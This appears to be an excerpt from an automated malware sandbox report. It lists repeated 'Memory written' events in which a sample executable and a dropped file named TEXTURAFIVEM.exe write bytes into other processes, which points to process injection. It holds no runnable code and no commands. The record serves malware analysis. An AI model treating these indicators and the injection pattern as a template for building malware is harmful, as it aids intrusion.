            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7CE0000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7D20000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7D70000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7DB0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7E00000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7EC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7F00000 value: 57Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: A940000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: A970000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: D230000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: D270000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E130000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E170000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E530000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E570000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E6B0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E6F0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E730000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E770000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E7B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E7F0000 value: 5AJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E830000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: E870000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EA30000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EA70000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EAB0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EAF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EB30000 value: 43Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EC00000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EBB0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EB90000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: EC60000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F080000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F0E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F520000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F070000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: ECF0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 2980000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FAC0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FB00000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FB10000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AA0000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F0B0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FBB0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FC30000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FCD0000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FD10000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F030000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FD50000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: FD90000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F560000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F5A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F5E0000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F620000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F660000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F6A0000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F6E0000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F720000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F760000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F7A0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F7E0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F820000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: F860000 value: 46Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 29A0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4DE0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4E10000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4E50000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4E90000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 4EC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7230000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7260000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 7290000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 72C0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 72F0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AEC0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AE60000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AE90000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AED0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: AF00000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B0A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: 24010000 value: 4DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B0F0000 value: 00Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 3440 base: B120000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3330000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3340000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3350000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 33E0000 value: 4CJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 33F0000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3600000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3610000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3620000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3630000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3640000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3650000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3660000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3670000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3680000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3690000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B00000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B10000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B20000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B30000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B40000 value: 56Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B50000 value: 4BJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B60000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B70000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B80000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3B90000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BA0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BC0000 value: 52Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BD0000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BE0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3BF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C00000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C10000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 3C20000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 53E0000 value: 63Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 53F0000 value: 41Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5400000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5410000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5450000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5460000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5470000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5480000 value: 42Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5490000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54A0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54C0000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54D0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 54F0000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5500000 value: 67Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5510000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55B0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55C0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55D0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55E0000 value: 57Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 55F0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5600000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5610000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56A0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56B0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56C0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56D0000 value: 61Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56E0000 value: 6DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 56F0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5700000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5710000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57A0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57B0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57C0000 value: 5AJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57D0000 value: 6EJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57E0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 57F0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5800000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5810000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58A0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58B0000 value: 43Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58C0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58D0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58E0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 58F0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5900000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5910000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59A0000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59B0000 value: 6FJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59C0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59D0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59E0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 59F0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5A00000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5A10000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AA0000 value: 70Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AB0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AD0000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AE0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5AF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5B00000 value: 53Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5B10000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BA0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BB0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BC0000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BD0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BE0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5BF0000 value: 47Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5C00000 value: 75Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5C10000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CA0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CB0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CC0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CD0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CE0000 value: 46Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5CF0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5D00000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5D10000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DA0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DB0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DC0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DD0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DE0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5DF0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5E00000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5E10000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EA0000 value: B0Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EB0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EC0000 value: 73Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5ED0000 value: 77Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EE0000 value: 90Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5EF0000 value: 55Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 24080000 value: 4DJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5F00000 value: 00Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: PID: 5908 base: 5F10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CC0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: CD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D60000 value: 4CJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D70000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D80000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: D90000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DA0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DC0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DE0000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: DF0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: E00000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: E10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 3370000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DB0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DC0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DE0000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4DF0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E00000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E10000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E20000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E30000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E40000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E50000 value: 52Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E60000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E70000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E80000 value: 55Jump to behavior
